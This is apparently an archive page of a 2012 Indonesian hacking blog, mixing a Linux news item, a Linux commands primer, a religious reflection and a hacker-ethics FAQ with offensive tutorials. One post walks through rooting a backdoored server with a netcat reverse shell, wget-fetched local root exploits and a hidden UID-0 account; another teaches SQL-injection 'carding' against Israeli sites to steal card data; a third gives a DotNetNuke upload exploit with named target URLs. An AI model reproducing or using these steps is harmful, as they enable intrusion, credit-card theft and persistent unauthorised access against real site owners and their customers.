Monday, September 10, 2012



Daftar Isi

by:    No comments     

Tuesday, March 20, 2012



Root Server & Tambah User Root Baru

by:    No comments     
categories: 
Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah

Komputer & Kopi
Situs target yang sudah di inject “shell backdoor”
Tool-tool Localroot Exploit
Netcat

1 – Cari Informasi Detail Server Target

Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php”
Contoh: http://www.situstargetyangtelahdihack.com/path/dir/shell.php

Tampilannya akan seperti dibawah:

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:

Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a

Dari informasi diatas kita ketahui bahwa kernelnya adalah: 2.6.18-8 i686

Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Kita cari disini saja localroot exploitnya, kebetulan banyak listnya: localroot.th3-0utl4ws
download local root
2 – BackConnecting Dari Server Ke Komputer Attacker

Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:

Netcat Tools (Harus sudah terinstall di komputer)
Open port (Port-port yang secara otomatis terbuka)

Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 443:

C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443

Kemudian tekan “Enter”

Nanti akan muncul pesan “Listening on [any] 443 …”

Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.
Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.

Misal: IP Kita: 10.10.10.10 dan port: 443, seperti gambar dibawah:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Kita jalankan perintah “Connect”

Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
3 – Download Exploit & Eksekusi Exploit

Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu
1) Menggunakan fungsi “WGET / CURL”
2) Bisa menggunakan cara upload manual dari shell

Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”.
Oke, copy saja download link “localroot exploit yang tepat:

Download Kumpulan Tools Localroot Dari Th3-0utl4ws
download local root
Untuk mendownload tools diatas ketikkan saja perintah: wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip

Apabila sudah terdownload maka extract “local root tools” tersebut, bisa dengan menggunakan perintah “unzip” atau “untar” atau “tar”

Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:

unzip prct1.c.zip

Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:

gcc prct1.c -o prc

Kemudian jalankan:

./prc

Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (JANGAN MENYERAH!)

Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!

Unzip lagi file localroot exploit yang lainnya: unzip 2.6.18-164.zip

Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“2.6.18-164“)

Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi “777″, seperti contoh berikut:

chmod 777 2.6.18-164

Kemudian jalankan exploit:

./2.6.18-164

Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:

id
or
whoami

Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!
4 – Menambahkan User Root Baru

Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user “Haxorfortutorial“:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial

Penjelasan perintah:
Quote:

adduser – Perintah dasar linux untuk menambahkan user

-u 0 -o – set user menjadi dengan ID nol (0) root.

-g 0 – Set initial group dengan ID nol (0) root.

-G 0,1,2,3,4,6,10 – Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M – ‘home directory’ tidak di create ke user.

Haxorfortutorial - User name of the new user account.

Catatan: Rubah user Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja :)

Selanjutnya, lakukan set password untuk user yang telah kita buat.

Perintahnya:
passwd Haxorfortutorial

Contoh implementasi:

[root@fedora ~]# passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

id Haxorfortutorial

Backdoor GNY shell – http://privatepaste.com/1321f97984
Tools NetCat – http://downloadnetcat.com/nc11nt.zip


Linux 3.0 Sistem Operasi Linux Terbaru yang Tak Banyak Berubah

by:    No comments     
categories: 
1 Linux 3.0 Sistem Operasi Linux Terbaru yang Tak Banyak Berubah
Linux 3.0 Sistem Operasi Linux Terbaru yang Tak Banyak Berubah - Linux 3.0 telah dirilis oleh pendiri Linux, Linus Torvalds melalui akun google+ miliknya. Dalam sistem operasi terbaru yang dapat dipakai secara gratis ini, terdapat beberapa perbedaan dibandingkan dengan versi sebelumnya.
Perbedaan pertama yang sangat mencolok adalah sistem penomoran kernel linux, yang merupakan inti dari sistem operasi open source GNU/Linux. Jika pada versi sebelumnya memakai tiga nomor, maka saat ini hanya memakai dua nomor saja. Alih-alih memakai nama Linux 2.6.40, Torvalds lebih memilih angka 3.0.
Torvalds mengatakan penggantian nomor kernel tersebut tidak akan menjadi permasalahan. “Intinya 3.0 itu hanya penomoran ulang saja, kami tidak melakukan sebuah KDE-4 atau Gnome-3 apapun di sini,” ujar Torvalds.
Namun beberapa pihak melihat bahwa penomoran ulang nomor kernel dapat memberikan permasalahan. Banyak paket-paket kernel terdahulu melacak versi linux terbaru dengan cara mencari ’2.6′. Agar permasalahan ini dapat diatasi, maka perlu adanya pembaharuan.
Menanggapi hal tersebut, Torvalds mengatakan bahwa hal tersebut tidak menjadi masalah. “Seperti yang telah saya sebutkan beberapa kali, tidak ada fitur khusus atau ketidakcocokan terkait dengan perubahan nomor versi,” tulis Torvalds. Menurut dia, kritik tersebut adalah cara untuk menjatuhkan pamor Linux yang saat ini berulang tahun ke 20.
Selain sistem penomoran kernel yang berbeda, Linux 3.0 melakukan penambahan penyimpanan backend untuk Xen Hypervisor, pembaharuan sistem file Btrfs, dan peningkatan terhadap sejumlah driver untuk berbagai prosesor grafis dan peripheral.


Pengertian Linux Dan Perintah Dasarnya

by:    No comments     
categories: 
Pengertian Linux Dan Perintah Dasarnya - Siang sobat, Kali ini saya akan membahas sedikit tentang sistem operasi Linux, Apa itu linux? masri kita bahsa bersama.


Pengertian Linux

Linux adalah sebuah sistem operasi yang dikembangkan oleh Linus Benedict Torvalds dari Universitas Helsinki Finlandia sebagai proyek hobi mulai tahun 1991. Ia menulis Linux, sebuah kernel untuk prosesor 80386, prosesor 32-bit pertama dalam kumpulan CPU Intel yang cocok untuk PC. Baru pada tanggal 14 Maret 1994 versi 1.0 mulai diluncurkan, dan hal ini menjadi tonggak sejarah Linux.
Linux merupakan clone dari UNIX yang telah di- port ke beragam platform, antara lain: Intel 80×86, AlphaAXP, MIPS, Sparch, Power PC, dsb. Sekitar 95% kode sumber kernel sama untuk semua platform perangkat keras.
Linux termasuk sistem operasi yang didistribusikan secara open source, artinya kode sumber Linux diikutsertakan sehingga dapat dipelajari dan dikembangkan dengan mudah. Selain itu Linux dikembangkan oleh GNU (General Public License). Linux dapat digunakan untuk berbagai keperluan, seperti: jaringan, pengembangan software, dan sebagai end-user platform.
Selama ini Linux menjadi sistem operasi yang menjadi banyak perhatian karena kecanggihan dan harganya yang relatif murah dibanding dengan sistem operasi yang lain. Macam-macam distribusi Linux antara lain: Stackware, Debian, RedHat, S.u.s.e., Caldera, dan Turbo Linux. Macam-macam distribusi Linux ini akan dibahas lebih mendalam pada “Distro”.
Istilah Linux atau GNU/Linux (GNU) juga digunakan sebagai rujukan kepada keseluruhan distro Linux (Linux distribution), yang didalamnya selalu disertakan program-program lain yang mendukung sistem operasi ini. Contoh program-program tersebut adalah Web Server, Bahasa Pemrograman, Basis Data, Tampilan Desktop (Desktop Environment) (seperti GNOME dan KDE), dan aplikasi/ software perkantoran (office suite) seperti OpenOffice.org, KOffice, Abiword, Gnumeric, dan lainnya.
Distro Linux telah mengalami pertumbuhan yang pesat dari segi popularitas, sehingga lebih populer dari versi UNIX yang menganut sistem lisensi dan berbayar (proprietary) maupun versi UNIX bebas lain yang pada awalnya menandingi dominasi Microsoft Windows dalam beberapa sisi.
Perintah Dasar Linux

Perintah “ & ”

Perintah & digunakan untuk menjalan perintah di belakang (background).
Contoh: wget http://id.wikibooks.org &
Perintah & dipakai dibelakang perintah lain untuk menjalankannya di background. Apa itu jalan di background? Jalan dibackground maksudnya adalah kita membiarkan sistem untuk menjalankan perintah sendiri tanpa partisipasi kita, dan membebaskan shell/command prompt agar bisa dipergunakan menjalankan perintah yang lain.

Perintah “ Adduser “

Perintah adduser digunakan untuk menambahkan user. Biasanya hanya dilakukan oleh root untuk menambahkan user atau account yg baru. Setelah perintah ini bisa dilanjutkan dengan perintah passwd, yaitu perintah untuk membuat password bagi user tersebut.
Contoh:
# adduser iqbal
# passwd iqbal

Perintah “ alias “

Digunakan untuk memberi nama lain dari sebuah perintah. Misalnya bila Anda ingin perintah ls dapat juga dijalankandengan mengetikkan perintah dir, maka buatlah aliasnya sebagai berikut : $ alias dir=ls
Kalau Anda suka dengan tampilan berwarna-warni, cobalah bereksperimen dengan perintah berikut: $ alias dir=ls -ar –color:always
Untuk melihat perintah-perintah apa saja yang mempunyai nama lain saat itu, cukup ketikkan alias saja (tanpa argumen). Lihat juga perintah unalias.

Perintah “ bg “

Untuk memaksa sebuah proses yang dihentikan sementara(suspend) agar berjalan di background.

Perintah “ cat “

Untuk menampilkan isi dari sebuah file di layar.
Contoh: $ cat /nama/suatu/file

Perintah “ cd “

Directory atau untuk berpindah direktori dan saya kira Anda tidak akan menemui kesulitan menggunakan perintah ini karena cara penggunaanya mirip dengan perintah cd di DOS.

Perintah “ chgrp “

Perintah ini digunakan untuk merubah kepemilikan kelompok file atau direktori. Misalnya untuk memberi ijin pada kelompok atau grup agar dapat mengakses suatu file. Sintaks penulisannya adalah sebagai berikut : # chgrp

Perintah “ chmod “

Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori. Anda dapat menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permission/perijinan yang dapat dirubah yaitu:

Perintah “ zip “

Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip.

Dan masih banyak lagi perintah - perintah dasar pada Linux yang bisa sobat pelajari sendiri, Sekian artikel kali ini tentang Pengertian Linux Dan Perintah Dasarnya, semoga bisa bermanfaat bagi sobat semua.

Saturday, March 17, 2012



Tutorial Carding Step By Step

by:    1 comment     
categories: 
Kali ini aku membuat tutorial carding yg dimana target yg ku serang adalah masyarakat Israel.
Sebener nya ini tutor buat yg cupu kayak saya..
Hahahaha…

Tools yg di siapkan yaitu:
#. Google Url Extractor
#. Sql Exploiter

tahap tahap yg di lakukan pertama
# buka google extractor, lalu masukan dork product.asp?id= site:il
# trus scan, kalo sudah muncul link-link yg keluar silakan di klik kanan trus

Remove Duplicate, biar gk keder

1

# lalu pindah ke tab Sql Injector Query Builder
# masukan argumen tanda tanya (?) di Insert arguments here
# kalo sudah klik Build dan Scan

2

# trus ke tab berikutnya yaitu tab Attack Victim
# cari yg error result nya : unclosed quotation mark before the character ….. gk tau knp pokok nya ikutin aja jgn banyak tanya :p
# klik kanan copy url yg victim

3

tahap pemakaian sql exploiter
# buka sql exploiter trus ke tab Attacker for the Hackable Site !!
# klik Add Manualy , masukan url victim yg tadi, trus paste (kadang tanda harus di hilangkan)

4

# kalo udah klik Site Info sampai infonya keluar
# kalo udah keluar maka tinggal Get Tables, maka akan muncul table” web tersebut, yg ku tandai warna biru

5

# pilih salah 1 yg ada di table tsbt, yg kira” dimana letak CC nya, trus Get Columns buat mengetahui columns apa aja di table tsb, tapi kali ini aku gk ke table order
# kalo udah muncul semua columns , drag semua colomns terus get data

6

Aku gk ngajarin kejahatan lo, cuma buat info aja, kalo di tangkep Satpol PP jgn bawa” nama ku :p


Share









Friday, March 16, 2012



Ingatlah Kematian

by:    No comments     
categories: 

Dikisahkan bahwa malaikat maut (Izrail) bertemu dengan Nabi Sulaiman AS. Ia datang dengan bentuk manusia sehingga tak seorang pun yang mengetahui kedatangannya selain Nabi Sulaiman. Saat itu Nabi Sulaiman sedang berkumpul dengan beberapa orang sahabatnya. Saat malaikat maut hendak pergi ia memandang salah seorang sahabat Nabi Sulaiman dengan pandangan yang aneh, lalu pergi.

Setelah malaikat maut pergi, sahabat Nabi Sulaiman itu bertanya, “Wahai Nabiyullah, mengapa ia memandangiku seperti itu?” Jawab Nabi Sulaiman, “Ketahuilah, dia itu adalah malaikat maut.”

Kemudian sahabat Nabi Sulaiman itu berkata, “Wahai Nabi, tiupkanlah angin dengan kencang, sehingga angin itu membawaku ke puncak negeri India, sesungguhnya aku berfirasat buruk.”

“Apakah engkau akan lari dari takdir jika maut akan menjemputmu?” tanya Nabi Sulaiman. “Sesunguhnya Allah memerintahkan kita untuk mencari sebab-sebabnya. Dan, aku yakin bahwa engkau akan mengabulkan permintaanku.” kata sahabat Nabi Sulaiman itu. Kemudian, Nabi Sulaiman memerintahkan kepada angin untuk membawanya ke tempat yang diinginkan.

Selang beberapa saat malaikat maut datang, Nabi Sulaiman bertanya, “Apa urusanmu dengan salah seorang sahabatku, mengapa engkau pandangi dia seperti itu?”

Malaikat maut menjawab, “Aku memandanginya seperti itu dikarenakan ia tercatat didaftar kematian bahwa ia akan mati di sebuah negeri di India. Aku heran, bagaimana ia dapat pergi ke sana sedangkan ia ada bersamamu? Kemudian, di tempat yang telah ditentukan, pada waktu yang telah digariskan kulihat ia datang kepadaku dan kucabut nyawanya.”

Kisah di atas mengingatkan kepada kita bahwa malaikat maut akan selalu mengintai siapa saja yang masa kontraknya akan berakhir di dunia ini. Jika masa kontraknya habis maka tak seorang pun dapat lari darinya. “.… Maka, apabila telah datang waktunya mereka tidak dapat mengundurkannya barang sesaat pun dan tidak dapat (pula) memajukannya.” (QS al-A’raf [7]: 34).

Dalam ayat lain Allah SWT menegaskan, “Dan datanglah sakaratul maut dengan sebenar-benarnya. Itulah yang kamu selalu lari daripadanya.” (QS Qaf [50]: 19).
Lari kepada dokter bila sakit menimpa, lari kepada makan bila rasa lapar datang, lari kepada minum bila rasa haus menghampiri. Lalu, lari kepada siapa bila kematian akan menjemputmu?

Sungguh, tak seorang pun dapat lari darinya sekalipun berada di dalam benteng yang tinggi lagi kokoh. “Di mana saja kamu berada, kematian akan mendapatkan kamu, kendatipun kamu di dalam benteng yang tinggi lagi kokoh.” (QS an-Nisa’ [4]: 78).

Oleh karena itu, sebelum masa kontrak berakhir, “Bersegeralah kamu beramal sebelum datang tujuh perkara: kemiskinan yang memperdaya, kekayaan yang menyombongkan, sakit yang memayahkan, tua yang melemahkan, kematian yang memutuskan, dajjal yang menyesatkan, dan kiamat yang sangat berat dan menyusahkan.” (HR Tirmidzi). Wallahu a’lam.



apa kamu hacker..???

by:    No comments     
categories: 
Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com



ReFerensi :

[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting

*greetz to:
[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },

anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel

kirimkan kritik && saran ke y3dips[at]echo.or.id

*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004[/i]

Monday, March 12, 2012



Hacking Website Melalui Handphone

by:    No comments     
categories: 
Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘ kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.


Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!

Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:

1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya tanpa harus open close satu2.

2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.

3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0

Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->

inurl:”/portals/0″

And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:

http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…

Example site:
http://fril.co.il/portals/0/cwindex.txt

Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx

->http://site.com/[path]/portals/0/a.txt

Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx

Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.

http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!

Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….

Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
